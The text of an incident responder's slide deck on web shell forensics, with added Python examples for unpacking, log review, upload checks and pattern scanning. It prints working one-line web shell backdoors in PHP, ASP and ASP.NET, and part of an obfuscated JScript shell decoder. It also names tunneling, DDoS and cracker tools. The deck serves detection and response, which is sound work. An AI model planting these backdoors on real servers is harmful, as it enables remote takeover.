Advanced Web Shell Forensic Analysis
Vincent Lo
PART ONE

Reminder
Level: Advanced
Prerequisite:
Disclaimer
Opinions are my own and not the views of my employer.
Who is this guy?
Vincent Lo
Senior Incident Responder
CISSP, CCE, GCFA Gold, GCIH, GNFA, GREM
Twitter: @_VincentLo_
What are we talking about today?
PART ONE (BASIC): 1:00 pm – 2:00 pm
PART TWO (ADVANCED): 2:30 pm – 3:30 pm

Agenda
PART ONE (BASIC)
• Introduction
  What are they?
  Well-known web shells
• Web Shell Analysis Techniques
  Dynamic behavior analysis
PART TWO (ADVANCED)
• Advanced source code analysis
• Advanced Features
  Hidden Shells
  Tunneling
  Mass Mailer
  DDoS
  System targeted shell
• Web Shell Prevention
• Web Shell Detection
• Incident Response
Web Shells

What are they?
• Dynamic web pages
• Written in server-side script languages, such as PHP, JSP, ASP, and ASP.NET
• Discovered many years ago
• Still evolving…
What can they do?

File Manager
• Copy
• Edit
• Delete
• Move
• Execute
• Upload

Server Information
• Operating system information
• Loaded Apache modules
• Disabled PHP functions
• Useful commands
• Downloader commands
• /etc/passwd
• CPU Info
• Memory Info
• Partition Info
• PHP Environment

System Thread Information
• List
• Kill

Console
• Run your own commands
• List dir
• Find
• Locate

PHP
• Execute your own code

String Tools
• String conversion
• Encode/Decode
• MD5 cracking websites

Bruteforce
• FTP
• MySql
• PostgreSql

SQL
• MySql
• PostgreSql

Network
• Bind port to /bin/sh
• Back-connect

Self Remove

And more… (will be introduced in PART TWO.)
Well known web shells
• WSO (FilesMan)
• b374k
• c99
• China Chopper (client program)
• Weevely
• And more…
Why do we care?
Well, what if they are found on your web servers?

Real Incident
Source: http://krebsonsecurity.com/2016/02/breached-credit-union-comes-out-of-its-shell/

How did they get into our web servers?
• Cross-Site Scripting
• SQL Injection
• Vulnerabilities in applications/services (e.g., WordPress or other CMS applications)
• File processing vulnerabilities (e.g., upload filtering or assigned permissions)
• Remote File Include (RFI) and Local File Include (LFI) vulnerabilities
• Exposed admin interfaces (possible areas to find the vulnerabilities mentioned above)
Web Shell Analysis

Why do we need to analyze them?
“If you know the enemy and yourself, you need not fear battles.
If you know yourself but not the enemy, for every victory gained you will also suffer a defeat.
If you know neither the enemy nor yourself, you will succumb in every battle.”
- The Art of War by Sun Tzu

How to analyze them?
• Dynamic behavior analysis
• Static source code analysis
  What to look for?
  What to do if it is packed?
  What if…?
• Advanced source code analysis
Dynamic behavior analysis | Environment
• Analysis Environment
  Sandbox
  Private Network
• Operating System
  Linux
  Windows
• Web Server
  Apache
  IIS
  Java Web Server
• Web Server Configuration
• Consulting work
  Pre-build the environment/template to reduce the response time.
  Try to mimic the client’s web server environment as much as possible.
• Ideal Environment
Dynamic behavior analysis
Demonstration
• WSO 2.0

• Pros
  Easy to understand how web shells work.
  Identify their features and artefacts in a short time.
  Can test functions and see if they really work.
• Cons
  May miss hidden functions.
  May not work if web shells require passwords.
  May need time to build/configure the environment.
Static source code analysis
• First time?
• Need to understand the server-side script languages. Google can be your best friend.
• Review code and get familiar with attack techniques.
• Don’t get discouraged and don’t give up easily. Some web shells are designed to be hard to read. Some web shells even contain fake functions/code.
• Don’t worry. The review speed will become faster and faster once you are more familiar with the code.
Static source code analysis | PHP | What to look for?
• Exercise (WSO 2.0)
  Try to identify interesting functions.
  Password
    Password is provided if you are lucky. ☺
    MD5 algorithm? MD5 algorithm!
  Avoid search engines
    HTTP 404 – Not Found
    Exit
  Commands behind the scene
  KOI8-R & KOI8-U
• Variable names
• Passwords
• Interesting functions
• Comments ☺
Static source code analysis | PHP | Password protected
• Find the password
  Check the source code
  Crack it
• Bypass/Kill the password

Static source code analysis | PHP | Obfuscation Techniques
• Login password
  Validation algorithm: MD5/SHA1
  Customised algorithm
• HTTP 404 code
• HTTP 404 page
• Variable Names
Static source code analysis | PHP | What if it is packed?
• Decoding environment
  Web server
  Web components
  Browser
• Decoding tools
  Online
  Manual
  May need to develop decoding tools to assist
• Encoding algorithm
  Base64
  ROT13
  Character encoding
  Customised encoding algorithms
  Multiple encoding with different algorithms
• Exercise (WSO 2.1)
  How to unpack the shell?
• Exercise (b374k)
  How to unpack the shell?
  String operators
  eval => echo
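As an added example (not part of the slides or of the WSO/b374k code), a small Python unpacker that does offline what the eval => echo trick does in PHP: it peels nested eval(base64_decode(...)) / str_rot13 / gzinflate layers from a constructed, doubly packed sample and stops at the first wrapper it does not know. The sample body and the set of decoders are assumptions.

```python
import base64
import codecs
import re
import zlib
# Decoders for the wrappers packed PHP shells stack around eval(): the slides list
# Base64, ROT13 and multiple layers; gzinflate() is the usual third one.
DECODERS = {
    "base64_decode": base64.b64decode,
    "str_rot13": lambda b: codecs.encode(b.decode("latin-1"), "rot_13").encode("latin-1"),
    "gzinflate": lambda b: zlib.decompress(b, -15),   # raw DEFLATE, like PHP's gzinflate()
    "gzuncompress": zlib.decompress,                  # zlib-wrapped, like PHP's gzuncompress()
}
EVAL = re.compile(r"^\s*(?:<\?php)?\s*eval\s*\((.*)\)\s*;?\s*(?:\?>)?\s*$", re.S)
CALL = re.compile(r"^\s*(\w+)\s*\(\s*(.*)\s*\)\s*$", re.S)
LITERAL = re.compile(r"^\s*(['\"])(.*)\1\s*$", re.S)

def unpack_layer(src):
    """Peel one eval(f(g("literal"))) layer (what eval => echo shows); None if src is not of that shape."""
    m = EVAL.match(src)
    if not m:
        return None
    expr, calls = m.group(1), []
    while not LITERAL.match(expr):
        call = CALL.match(expr)
        if not call or call.group(1) not in DECODERS:
            return None             # unknown wrapper: stop and hand back what we have
        calls.append(call.group(1))
        expr = call.group(2)
    data = LITERAL.match(expr).group(2).encode("latin-1")
    for name in reversed(calls):    # PHP evaluates the innermost call first
        data = DECODERS[name](data)
    return data.decode("latin-1")

def unpack(src, max_layers=20):
    """Keep peeling until no eval() wrapper is left; returns (source, layers peeled)."""
    for layers in range(max_layers):
        nxt = unpack_layer(src)
        if nxt is None:
            return src, layers
        src = nxt
    return src, max_layers

INNER = '<?php echo "decoded shell body"; ?>'   # constructed stand-in for a real shell body
def pack_sample():
    """Constructed, doubly packed sample: deflate+base64 inside, ROT13+base64 outside."""
    c = zlib.compressobj(wbits=-15)
    raw = c.compress(INNER.encode()) + c.flush()
    layer1 = 'eval(gzinflate(base64_decode("%s")));' % base64.b64encode(raw).decode()
    rot = codecs.encode(base64.b64encode(layer1.encode()).decode(), "rot_13")
    return '<?php eval(base64_decode(str_rot13("%s"))); ?>' % rot
```

Customised encoders (the slides' last bullet) need their own entry in DECODERS; the loop stops and returns the partially decoded source when it meets one it does not know.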
Intermittent

<script runat="server" language="JScript">
function exs(str) {
    var q = "u"; var w = "afe";
    var a = q + "ns" + w;           // builds the string "unsafe" piecewise so it never appears in the source
    var b = /*///*/eval(str, a);    // JScript.NET eval(code, "unsafe"); the comment noise is obfuscation
    return(b);
}
function dec(str, key) {
    var k, q, t; var s = ""; var p = "";
    for (k = 0; k < str.length; k = k + 2) {                   // walk the hex-encoded payload two chars at a time
        t = ((k + 2) / 2) % key.length; p = key.substr(t, 1);   // pick the key character for this position
        if (isFinite(str.substr(k, 1))) {
            q = "0x" + str.substr(k, 2); s = s + char(int(q) - p); // + "|" + p + "|";
        }
        else {
PART TWO

Advanced Source Code Analysis
Demonstration
• ASP | Self Changing Code

What if…? | One Sentence Trojan
• One Sentence Trojan (一句話木馬)
• PHP:
  <?php eval($_POST[cmd]);?>
• ASP:
  <%execute(request("cmd"))%>
• ASP.NET:
  <%@ Page Language="Jscript"%>
  <%eval(Request.Item["cmd"],"unsafe")%>
Source: http://baike.baidu.com/view/102246.htm
What if…? | One Sentence Trojan | Client Programs
• China Chopper (中国菜刀)
• Lanker (lanker 一句话客户端: one sentence client)
• ZV (ZV 新型 PHP 一句话木马客户端 GUI 版: new PHP one sentence trojan client, GUI edition)
• 一句话客户端增强版 (one sentence client, enhanced edition)
Source: http://baike.baidu.com/view/102246.htm
What if…? | One Sentence Trojan
In the real world, one sentence trojan code is not always the same. It can be modified or encoded to avoid detection.
• <%eval request("value")%>
• <%execute request("value")%>
• <%execute(request("value"))%>
• <%If Request("value")<>"" Then Execute(Request("value"))%>

How do we analyze it?
• Web server logs
• IDS/IPS alerts
• Proxy logs
• PCAP
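An added example, not from the slides: a Python pass over constructed Apache combined-format log lines that pulls out the traffic pattern a one sentence trojan leaves in the web server logs, namely repeated POSTs from one client, without a Referer, to a script nobody ever fetches with GET. The POST threshold, the sample addresses and the paths are assumptions.

```python
import collections
import re
# Apache/nginx "combined" format: ip ident user [time] "method uri proto" status size "referer" "ua"
LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\S+) "([^"]*)" "([^"]*)"')

def parse_line(line):
    """Split one access-log line into the fields worth pivoting on; None if malformed."""
    m = LINE.match(line)
    if not m:
        return None
    ip, when, method, uri, status, size, referer, ua = m.groups()
    return {"ip": ip, "time": when, "method": method, "uri": uri.split("?")[0],
            "status": int(status), "size": size, "referer": referer, "ua": ua}

def find_suspects(lines, min_posts=3):
    """A one sentence trojan is driven by POSTs (the 'cmd' body) from one client, with no
    Referer, to a script nobody ever browses with GET. Return (uri, ip, post_count) tuples
    that match all three conditions."""
    posts = collections.Counter()   # (uri, ip) -> POSTs sent without a Referer
    gets = set()                    # URIs that any client fetched with GET
    referred = set()                # (uri, ip) pairs that ever sent a Referer
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        if rec["method"] == "GET":
            gets.add(rec["uri"])
        elif rec["method"] == "POST":
            key = (rec["uri"], rec["ip"])
            if rec["referer"] == "-":
                posts[key] += 1
            else:
                referred.add(key)
    return sorted((uri, ip, n) for (uri, ip), n in posts.items()
                  if n >= min_posts and uri not in gets and (uri, ip) not in referred)

# Constructed sample log (RFC 5737 test addresses): normal browsing, a real form POST, and a
# burst of POSTs to an "image" script in the upload directory that nobody ever GETs.
SAMPLE_LOG = """\
198.51.100.7 - - [10/Feb/2016:13:02:11 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Feb/2016:13:02:12 +0000] "GET /images/logo.png HTTP/1.1" 200 812 "http://www.example.com/index.php" "Mozilla/5.0"
198.51.100.9 - - [10/Feb/2016:13:05:40 +0000] "POST /contact.php HTTP/1.1" 200 2210 "http://www.example.com/contact.php" "Mozilla/5.0"
203.0.113.5 - - [10/Feb/2016:13:07:01 +0000] "POST /uploads/img1.php HTTP/1.1" 200 84 "-" "Mozilla/4.0"
203.0.113.5 - - [10/Feb/2016:13:07:03 +0000] "POST /uploads/img1.php HTTP/1.1" 200 1913 "-" "Mozilla/4.0"
203.0.113.5 - - [10/Feb/2016:13:07:09 +0000] "POST /uploads/img1.php HTTP/1.1" 200 412 "-" "Mozilla/4.0"
203.0.113.5 - - [10/Feb/2016:13:07:15 +0000] "POST /uploads/img1.php HTTP/1.1" 200 77 "-" "Mozilla/4.0"
"""
```

The same pass works on proxy logs once parse_line is adapted to their fields; the "no GET, no Referer" heuristic is what makes a script-only endpoint stand out from a normal form handler.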
Advanced Features

Hidden | JPEG
• JPEG EXIF
  Hide malicious code in EXIF fields or embed it in files.
• Steganography
  http://www.slideshare.net/saumilshah/stegosploit-hacking-with-pictures
Source: http://www.arkteam.net/?p=48
Tunneling

SOCKS Proxy | reGeorg
“The successor to reDuh, pwn a bastion webserver and create SOCKS proxies through the DMZ. Pivot and pwn.”
• Client is written in Python
• Supports multiple server-side languages
  PHP
  ASPX
  ASHX
  JSP

Tunna
“Tunna is a set of tools which will wrap and tunnel any TCP communication over HTTP. It can be used to bypass network restrictions in fully firewalled environments.”
• Client is written in Python
• Supports multiple server-side languages
  PHP
  ASPX
  JSP
Source: https://github.com/SECFORCE/Tunna
Mass Mailer
DDoS
Why web servers?
• 24 x 7
• Accessibility
• More powerful than PCs usually
• Bandwidth

DDoS | Shell Booter
• Execute Booter
• Panic Stresser
• Vengeance Booter
• Anonymous Booter
• And more…
System targeted web shells | WHMCS Killer
• WHMCS

System targeted web shells | cPanel Cracker
• cPanel
Web Shell Prevention
“Prevention is more important than detection and recovery.”

Web Shell Prevention | Attacks, Vulnerabilities, & Patches
• Web Application Firewall
• Penetration Testing
  Update code
• Updates & Patches
  Operating System
  Web servers
Web Shell Prevention | Securing CMS
Source: https://www.us-cert.gov/ncas/alerts/TA15-314A
Hardening WordPress
http://codex.wordpress.org/Hardening_WordPress
Joomla – Security Checklist
https://docs.joomla.org/Security_Checklist
Web Shell Prevention | Upload Function
• Check uploaded files
  Whitelist file extensions
  Check the file extension properly: .php.jpg, .jpg.asp, .php;.jpg and so on.
  Don’t rely on file types
  Be careful about .cer if using IIS
• Randomize uploaded filenames
• Disable “execute” permission
• Don’t call it “upload”
  upload.aspx, upload.php and so on.
• Don’t show the actual path
  Error message
  URL
• Re-encode/re-generate images
• Disable components/functions that are not required.
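An added example, not from the slides, of the upload checks above in Python: a naive endsWith check beside a hardened one that rejects .php.jpg, .jpg.asp and .php;.jpg, randomises the stored name, and walks a JPEG's metadata segments for script markers (the EXIF hiding trick from the Hidden | JPEG slide). The whitelist, the marker list and the constructed minimal JPEG are assumptions.

```python
import os
import re
import secrets
import struct
ALLOWED = {"jpg", "jpeg", "png", "gif"}
SCRIPT_MARKERS = (b"<?php", b"<%", b"<script", b"eval(")   # code hiding in image metadata

def naive_ok(filename):
    """The weak check: trusts whatever follows the last dot."""
    return filename.lower().endswith(tuple("." + e for e in ALLOWED))

def extension_ok(filename):
    """Exactly one name token plus one whitelisted extension. Splitting on both '.'
    and ';' rejects .php.jpg, .jpg.asp, .php;.jpg and a stray .cer on IIS alike."""
    base = os.path.basename(filename.replace("\\", "/"))
    parts = [t.lower() for t in re.split(r"[.;]", base) if t]
    if len(parts) != 2 or not re.fullmatch(r"[a-z0-9_-]+", parts[0]):
        return False
    return parts[1] in ALLOWED

def jpeg_segments_clean(data):
    """Walk the JPEG marker segments (EXIF, comments, ...) that precede the image data
    and refuse the file if any of them carries a script marker."""
    if not data.startswith(b"\xff\xd8"):
        return False                   # not a JPEG at all, whatever the name says
    pos = 2
    while pos + 2 <= len(data) and data[pos] == 0xFF:
        if data[pos + 1] == 0xDA:      # SOS: entropy-coded image data starts here
            return True
        if pos + 4 > len(data):
            return False               # truncated segment header
        length = struct.unpack(">H", data[pos + 2:pos + 4])[0]
        if any(m in data[pos + 4:pos + 2 + length] for m in SCRIPT_MARKERS):
            return False
        pos += 2 + length
    return True

def accept_upload(filename, data):
    """Return the randomised name to store under, or None if the upload is rejected."""
    if not extension_ok(filename):
        return None
    ext = filename.rsplit(".", 1)[1].lower()
    if ext in ("jpg", "jpeg") and not jpeg_segments_clean(data):
        return None
    return secrets.token_hex(16) + "." + ext   # never reuse the client-supplied name

def jpeg_with_comment(comment):
    """Constructed minimal JPEG: SOI, one COM segment, then the SOS marker."""
    seg = b"\xff\xfe" + struct.pack(">H", len(comment) + 2) + comment
    return b"\xff\xd8" + seg + b"\xff\xda"
```

The segment walk is a cheap gate, not a substitute for the slide's "re-encode/re-generate images" step, which also strips metadata the markers do not cover.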
Web Shell Detection
Are they on our servers?

Web Shell Detection | How do we detect them?
• PHP Shell Detector
• NeoPI
• Web Vulnerability Scanners
• Antivirus programs
• IDS/IPS
• File Integrity System
Incident Response

Find evil | Evidence
• Web server logs
  Check integrity of logs
  Fields
• Proxy logs
• Web site files
• Relevant servers’ logs & artifacts
• IDS/IPS logs

Find evil | How do we find them?
• Yara
• Grep
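An added example (not from the slides and not a shipped Yara rule set) of the Grep step as a Python scanner: one regex per "what to look for" item from the static-analysis slides and the one sentence trojan variants, run over constructed sample files and ranked by number of hits. The indicator labels, patterns and samples are all assumptions.

```python
import re
# One (label, pattern) per "what to look for" item from the static-analysis slides and the
# one sentence trojan variants; the labels are constructed names, the patterns are this
# example's own, not from any shipped Yara rule set.
INDICATORS = [
    ("request-to-eval", r"(?:eval|execute|assert)\s*\(?\s*(?:\$_(?:POST|GET|REQUEST|COOKIE)\s*\[|request\s*\()"),
    ("encoded-eval", r"eval\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13|strrev)\s*\("),
    ("md5-password-gate", r"md5\s*\(\s*\$_(?:POST|COOKIE|REQUEST)"),
    ("404-then-exit", r"HTTP/1\.[01]\s+404[^;]*;\s*(?:exit|die)"),
    ("koi8-charset", r"koi8-[ru]"),
    ("known-shell-name", r"\b(?:FilesMan|WSO|b374k|c99)\b"),
]
COMPILED = [(label, re.compile(pat, re.I | re.S)) for label, pat in INDICATORS]

def scan_source(text):
    """Labels of every indicator that fires on one file's source, in INDICATORS order."""
    return [label for label, rx in COMPILED if rx.search(text)]

def scan_files(files):
    """files: {name: source}. Return {name: [labels]} for files with at least one hit,
    most hits first, so the review queue starts with the strongest candidates."""
    hits = {name: scan_source(src) for name, src in files.items()}
    ranked = sorted(hits.items(), key=lambda kv: -len(kv[1]))
    return {name: labels for name, labels in ranked if labels}

# Constructed samples standing in for a site's files (real shells are far longer).
SAMPLES = {
    "one_sentence.php": '<?php eval($_POST[cmd]);?>',
    "variant.asp": '<%If Request("value")<>"" Then Execute(Request("value"))%>',
    "packed.php": '<?php eval(gzinflate(base64_decode("CONSTRUCTED_BLOB"))); ?>',
    "wso_like.php": (
        '<?php $auth_pass = "CONSTRUCTED_MD5_HASH";\n'
        'if (md5($_POST["pass"]) != $auth_pass) { header("HTTP/1.0 404 Not Found"); exit; }\n'
        '$default_charset = "KOI8-R"; // FilesMan\n'
    ),
    "clean.php": '<?php echo htmlspecialchars($_GET["q"]); ?>',
}
```

A single hit is a lead for manual review, not a verdict; packed shells only show "encoded-eval" until they are unpacked, after which the other indicators become visible.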
Find evil | Experience
Recap
What do we learn today?
• Well-known web shells
• Dynamic analysis
• Static analysis
• Web shell prevention and detection
• Incident response
• The analysis concept we learned today works for analyzing malicious PowerShell scripts too.

Vincent Lo | Senior Incident Responder
TWITTER: @_VincentLo_  EMAIL: [email protected]